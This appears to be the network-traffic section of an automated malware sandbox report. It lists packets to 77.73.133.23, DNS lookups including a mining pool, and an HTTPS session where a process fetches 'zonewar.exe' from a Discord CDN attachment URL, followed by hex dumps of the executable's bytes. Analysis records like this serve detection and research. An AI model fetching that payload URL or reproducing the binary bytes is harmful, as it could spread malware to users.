Dec 5, 2022 01:32:59.852129936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852155924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852168083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.852168083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.852184057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852210999 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852236032 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.852236032 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.852271080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.382256031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.439331055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.439392090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.439433098 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.439451933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.439451933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.439474106 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.439517021 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.439523935 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.439523935 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.439557076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.439591885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.439604998 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.439604998 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.440849066 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454535961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454628944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454668999 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454710007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454742908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454742908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454749107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454790115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454802990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454802990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454826117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454868078 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.454889059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454889059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454924107 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.454956055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455001116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455040932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455050945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455050945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455085039 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455100060 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455127001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455140114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455168009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455207109 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455216885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455216885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455248117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455287933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455300093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455300093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455327988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455343962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455368042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455409050 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455450058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455463886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455463886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455488920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455528975 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.455540895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455540895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.455945969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.468965054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469024897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469065905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469100952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469140053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469167948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.469167948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.469181061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469223022 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469237089 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.469237089 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.469255924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469295025 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469306946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.469306946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:33:00.469336033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:33:00.469377041 CET	80	49707	77.73.133.23	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2022 01:32:29.662493944 CET	192.168.2.3	8.8.8.8	0x7be0	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:29.955544949 CET	192.168.2.3	8.8.8.8	0x2814	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:36.171118975 CET	192.168.2.3	8.8.8.8	0x4c36	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:36.196306944 CET	192.168.2.3	8.8.8.8	0xde51	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:43.359978914 CET	192.168.2.3	8.8.8.8	0x6020	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:34:37.443902016 CET	192.168.2.3	8.8.8.8	0x2998	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2022 01:32:29.885417938 CET	8.8.8.8	192.168.2.3	0x7be0	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2022 01:32:29.885417938 CET	8.8.8.8	192.168.2.3	0x7be0	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:30.123034954 CET	8.8.8.8	192.168.2.3	0x2814	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2022 01:32:30.123034954 CET	8.8.8.8	192.168.2.3	0x2814	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:36.188601971 CET	8.8.8.8	192.168.2.3	0x4c36	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2022 01:32:36.188601971 CET	8.8.8.8	192.168.2.3	0x4c36	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:36.215687037 CET	8.8.8.8	192.168.2.3	0xde51	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2022 01:32:36.215687037 CET	8.8.8.8	192.168.2.3	0xde51	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:43.380045891 CET	8.8.8.8	192.168.2.3	0x6020	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:43.380045891 CET	8.8.8.8	192.168.2.3	0x6020	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:43.380045891 CET	8.8.8.8	192.168.2.3	0x6020	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:43.380045891 CET	8.8.8.8	192.168.2.3	0x6020	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:32:43.380045891 CET	8.8.8.8	192.168.2.3	0x6020	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:34:37.461652040 CET	8.8.8.8	192.168.2.3	0x2998	No error (0)	pool.hashvault.pro		95.179.241.203	A (IP address)	IN (0x0001)	false
Dec 5, 2022 01:34:37.461652040 CET	8.8.8.8	192.168.2.3	0x2998	No error (0)	pool.hashvault.pro		45.76.89.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

www.idpminic.org

77.73.133.23

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49706	162.159.129.233	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-05 00:32:43 UTC	0	OUT	GET /attachments/976559212974997544/1048575639000715314/zonewar.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2022-12-05 00:32:43 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 05 Dec 2022 00:32:43 GMT Content-Type: application/x-msdos-program Content-Length: 124986 Connection: close CF-Ray: 7748afb1dd0890dc-FRA Accept-Ranges: bytes Age: 127646 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename="zonewar.exe" ETag: "b5cc85bb2fcfa979bc843618c0119d05" Expires: Tue, 05 Dec 2023 00:32:43 GMT Last-Modified: Sat, 03 Dec 2022 12:25:14 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 x-goog-generation: 1670070314028611 x-goog-hash: crc32c=58+HPw== x-goog-hash: md5=tcyFuy/PqXm8hDYYwBGdBQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 124986 X-GUploader-UploadID: ADPycdvwJW20yeHWepX1PzpQ8hSqbVuDQQnkEohcVK2_P7Z_0OtDpmREqiUAYzG1pygEIBjnNpPHqhexRE7EUL3n88PXH9d528_t X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=pHIK6mwpun2xqk.lUfNblRq7yWwFM6tqBsCDUGVQalg-1670200363-0-AUmSHHMlnOY0kiupD8aJnz4NRZTjAxbqDHzYWAGHvjTYUDCvLTwk4zdSs/iz2JvAmEn6Cj7ZIVU9RVIOEtxZGuA=; path=/; expires=Mon, 05-Dec-22 01:02:43 GMT; domain=.discordapp.com; HttpOnly; Secure
2022-12-05 00:32:43 UTC	1	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 55 39 61 7a 6c 25 32 46 41 44 65 52 41 64 6e 6b 52 4a 6e 4c 7a 42 53 47 54 69 79 75 57 4d 6a 53 31 4f 33 57 36 46 64 69 50 56 42 4f 49 77 4e 36 55 4b 61 37 79 25 32 42 43 4a 65 39 67 4c 75 74 45 43 30 37 53 45 77 7a 31 68 62 47 4f 43 4d 78 64 30 73 63 61 73 41 41 52 54 4d 61 61 43 49 79 64 46 54 75 6e 66 7a 54 58 4e 45 52 55 68 54 48 34 34 47 31 5a 39 77 6c 4d 50 59 49 37 74 55 6f 75 78 79 4f 36 67 33 43 68 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U9azl%2FADeRAdnkRJnLzBSGTiyuWMjS1O3W6FdiPVBOIwN6UKa7y%2BCJe9gLutEC07SEwz1hbGOCMxd0scasAARTMaaCIydFTunfzTXNERUhTH44G1Z9wlMPYI7tUouxyO6g3Chw%3D%3D"}],"group":"cf-nel","max_age":60
2022-12-05 00:32:43 UTC	1	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0f 00 fc 3f 8b 63 00 94 01 00 a0 03 00 00 e0 00 06 01 0b 01 02 27 00 58 00 00 00 76 01 00 00 02 00 00 90 14 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 90 b9 02 00 03 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL?c'Xvp@@@
2022-12-05 00:32:43 UTC	2	IN	Data Raw: 15 58 90 41 00 89 10 e8 21 47 00 00 83 3d b4 5d 41 00 01 74 48 31 c0 83 c4 1c c3 66 90 c7 04 24 02 00 00 00 e8 e4 55 00 00 eb c2 66 90 0f b7 51 18 66 81 fa 0b 01 74 37 66 81 fa 0b 02 75 94 83 b9 84 00 00 00 0e 76 8b 8b 91 f8 00 00 00 31 c0 85 d2 0f 95 c0 e9 79 ff ff ff 8d 76 00 c7 04 24 b0 58 40 00 e8 34 4d 00 00 31 c0 83 c4 1c c3 83 79 74 0e 0f 86 5a ff ff ff 8b 89 e8 00 00 00 31 c0 85 c9 0f 95 c0 e9 48 ff ff ff 66 90 83 ec 2c a1 44 90 41 00 c7 44 24 10 04 90 41 00 a3 04 90 41 00 a1 ac 5d 41 00 c7 44 24 08 14 90 41 00 89 44 24 0c c7 44 24 04 18 90 41 00 c7 04 24 1c 90 41 00 e8 26 55 00 00 83 c4 2c c3 66 90 8d 4c 24 04 83 e4 f0 31 c0 ff 71 fc 55 89 e5 57 56 8d 55 a4 53 89 d7 51 b9 11 00 00 00 83 ec 78 8b 35 5c 90 41 00 f3 ab 85 f6 0f 85 90 02 00 00 64 a1 Data Ascii: XA!G=]AtH1f$UfQft7fuv1yv$X@4M1ytZ1Hf,DAD$AA]AD$AD$D$A$A&U,fL$1qUWVUSQx5\Ad
2022-12-05 00:32:43 UTC	4	IN	Data Raw: 05 78 61 41 00 d9 5d fc d9 05 7c 61 41 00 d9 5d fc d9 45 fc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 fc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 80 61 41 00 d9 5d fc d9 05 84 61 41 00 d9 5d fc d9 05 88 61 41 00 d9 5d fc d9 45 fc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 fc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 8c 61 41 00 d9 5d fc d9 05 90 61 41 00 d9 5d fc d9 05 94 61 41 00 d9 5d fc d9 45 fc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 fc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 98 61 41 00 d9 5d fc d9 05 9c 61 41 00 d9 5d fc d9 05 a0 61 41 00 d9 5d fc d9 45 fc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 fc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 a4 61 41 00 d9 5d fc d9 05 a8 61 41 00 d9 5d fc d9 05 ac 61 41 00 d9 Data Ascii: xaA]\|aA]EEEtaA]aA]aA]EEEtaA]aA]aA]EEEtaA]aA]aA]EEEtaA]aA]aA
2022-12-05 00:32:43 UTC	5	IN	Data Raw: d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 9c 62 41 00 d9 5d ec d9 05 a0 62 41 00 d9 5d ec d9 05 a4 62 41 00 d9 5d ec d9 45 ec d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 ec d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 a8 62 41 00 d9 5d ec d9 05 ac 62 41 00 d9 5d ec d9 05 b0 62 41 00 d9 5d ec d9 45 ec d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 ec d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 b4 62 41 00 d9 5d ec d9 05 b8 62 41 00 d9 5d ec d9 05 bc 62 41 00 d9 5d e8 d9 05 c0 62 41 00 d9 5d e8 d9 05 c4 62 41 00 d9 5d e8 d9 45 e8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 c8 62 41 00 d9 5d e8 d9 05 cc 62 41 00 d9 5d e8 d9 05 d0 62 41 00 d9 5d e8 d9 45 e8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 Data Ascii: EtbA]bA]bA]EEEtbA]bA]bA]EEEtbA]bA]bA]bA]bA]EEEtbA]bA]bA]E
2022-12-05 00:32:43 UTC	6	IN	Data Raw: d9 5d fc d9 05 c0 63 41 00 d9 5d fc d9 45 fc d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 fc d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 c4 63 41 00 d9 5d fc d9 05 c8 63 41 00 d9 5d fc d9 05 cc 63 41 00 d9 5d f8 d9 05 d0 63 41 00 d9 5d f8 d9 05 d4 63 41 00 d9 5d f8 d9 45 f8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 d8 63 41 00 d9 5d f8 d9 05 dc 63 41 00 d9 5d f8 d9 05 e0 63 41 00 d9 5d f8 d9 45 f8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 e4 63 41 00 d9 5d f8 d9 05 e8 63 41 00 d9 5d f8 d9 05 ec 63 41 00 d9 5d f8 d9 45 f8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 f0 63 41 00 d9 5d f8 d9 05 f4 Data Ascii: ]cA]EEEtcA]cA]cA]cA]cA]EEEtcA]cA]cA]EEEtcA]cA]cA]EEEtcA]
2022-12-05 00:32:43 UTC	8	IN	Data Raw: dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 e8 64 41 00 d9 5d e8 d9 05 ec 64 41 00 d9 5d e8 d9 05 f0 64 41 00 d9 5d e8 d9 45 e8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 f4 64 41 00 d9 5d e8 d9 05 f8 64 41 00 d9 5d e8 d9 05 fc 64 41 00 d9 5d e8 d9 45 e8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 00 65 41 00 d9 5d e8 d9 05 04 65 41 00 d9 5d e8 d9 05 08 65 41 00 d9 5d e8 d9 45 e8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 0c 65 41 00 d9 5d e8 d9 05 10 65 41 00 d9 5d e8 d9 05 14 65 41 00 d9 5d e8 d9 45 e8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e8 d9 ee Data Ascii: EEtdA]dA]dA]EEEtdA]dA]dA]EEEteA]eA]eA]EEEteA]eA]eA]EE
2022-12-05 00:32:43 UTC	9	IN	Data Raw: 04 66 41 00 d9 5d f8 d9 05 08 66 41 00 d9 5d f8 d9 05 0c 66 41 00 d9 5d f8 d9 45 f8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 10 66 41 00 d9 5d f8 d9 05 14 66 41 00 d9 5d f8 d9 05 18 66 41 00 d9 5d f8 d9 45 f8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 1c 66 41 00 d9 5d f8 d9 05 20 66 41 00 d9 5d f8 d9 05 24 66 41 00 d9 5d f8 d9 45 f8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 28 66 41 00 d9 5d f8 d9 05 2c 66 41 00 d9 5d f8 d9 05 30 66 41 00 d9 5d f4 d9 05 34 66 41 00 d9 5d f4 d9 05 38 66 41 00 d9 5d f4 d9 45 f4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 Data Ascii: fA]fA]fA]EEEtfA]fA]fA]EEEtfA] fA]$fA]EEEt(fA],fA]0fA]4fA]8fA]EEEt
2022-12-05 00:32:43 UTC	10	IN	Data Raw: ba 01 00 00 00 d9 45 e8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 2c 67 41 00 d9 5d e8 d9 05 30 67 41 00 d9 5d e8 d9 05 34 67 41 00 d9 5d e8 d9 45 e8 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e8 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 38 67 41 00 d9 5d e8 d9 05 3c 67 41 00 d9 5d e8 d9 05 40 67 41 00 d9 5d e4 d9 05 44 67 41 00 d9 5d e4 d9 05 48 67 41 00 d9 5d e4 d9 45 e4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 4c 67 41 00 d9 5d e4 d9 05 50 67 41 00 d9 5d e4 d9 05 54 67 41 00 d9 5d e4 d9 45 e4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 58 67 41 00 d9 5d e4 d9 05 5c 67 41 00 d9 5d e4 d9 05 60 67 41 00 d9 5d e4 d9 45 e4 d9 ee df e9 dd d8 Data Ascii: EEt,gA]0gA]4gA]EEEt8gA]<gA]@gA]DgA]HgA]EEEtLgA]PgA]TgA]EEEtXgA]\gA]`gA]E
2022-12-05 00:32:43 UTC	12	IN	Data Raw: 5d f8 d9 05 4c 68 41 00 d9 5d f8 d9 05 50 68 41 00 d9 5d f4 d9 05 54 68 41 00 d9 5d f4 d9 05 58 68 41 00 d9 5d f4 d9 45 f4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 5c 68 41 00 d9 5d f4 d9 05 60 68 41 00 d9 5d f4 d9 05 64 68 41 00 d9 5d f4 d9 45 f4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 68 68 41 00 d9 5d f4 d9 05 6c 68 41 00 d9 5d f4 d9 05 70 68 41 00 d9 5d f4 d9 45 f4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 74 68 41 00 d9 5d f4 d9 05 78 68 41 00 d9 5d f4 d9 05 7c 68 41 00 d9 5d f4 d9 45 f4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 f4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 80 68 Data Ascii: ]LhA]PhA]ThA]XhA]EEEt\hA]`hA]dhA]EEEthhA]lhA]phA]EEEtthA]xhA]\|hA]EEEth
2022-12-05 00:32:43 UTC	13	IN	Data Raw: e4 d9 45 e4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 78 69 41 00 d9 5d e4 d9 05 7c 69 41 00 d9 5d e4 d9 05 80 69 41 00 d9 5d e4 d9 45 e4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 84 69 41 00 d9 5d e4 d9 05 88 69 41 00 d9 5d e4 d9 05 8c 69 41 00 d9 5d e4 d9 45 e4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 90 69 41 00 d9 5d e4 d9 05 94 69 41 00 d9 5d e4 d9 05 98 69 41 00 d9 5d e4 d9 45 e4 d9 ee df e9 dd d8 0f 9a c0 ba 01 00 00 00 d9 45 e4 d9 ee df e9 dd d8 0f 45 c2 84 c0 74 12 d9 05 9c 69 41 00 d9 5d e4 d9 05 a0 69 41 00 d9 5d e4 d9 05 a4 69 41 00 d9 5d e0 d9 05 a8 69 41 00 d9 5d e0 d9 05 ac 69 41 Data Ascii: EEEtxiA]\|iA]iA]EEEtiA]iA]iA]EEEtiA]iA]iA]EEEtiA]iA]iA]iA]iA
2022-12-05 00:32:43 UTC	14	IN	Data Raw: 60 ff ff ff 8d 45 ce 89 04 24 a1 f8 a0 41 00 ff d0 83 ec 04 89 45 ec c7 45 c8 00 00 00 00 8d 45 db 89 44 24 04 8b 45 ec 89 04 24 a1 fc a0 41 00 ff d0 83 ec 08 a3 3c 90 41 00 a1 3c 90 41 00 8d 55 c8 89 54 24 0c c7 44 24 08 40 00 00 00 8b 55 0c 89 54 24 04 8b 55 08 89 14 24 ff d0 83 ec 10 b8 00 00 00 00 ba 00 00 00 00 c9 c3 55 89 e5 83 ec 10 c7 45 fc 18 02 00 00 d9 05 e8 69 41 00 d9 5d f8 c7 45 f4 35 00 00 00 8b 45 fc 2d 97 00 00 00 89 45 f0 83 7d f0 00 75 07 b8 00 00 00 00 eb 03 8b 45 f0 c9 c3 55 89 e5 83 ec 68 d9 05 ec 69 41 00 d9 5d ec d9 05 f0 69 41 00 d9 5d ec d9 05 f4 69 41 00 d9 5d ec d9 45 ec d9 ee df e9 dd d8 0f 9a c0 ba 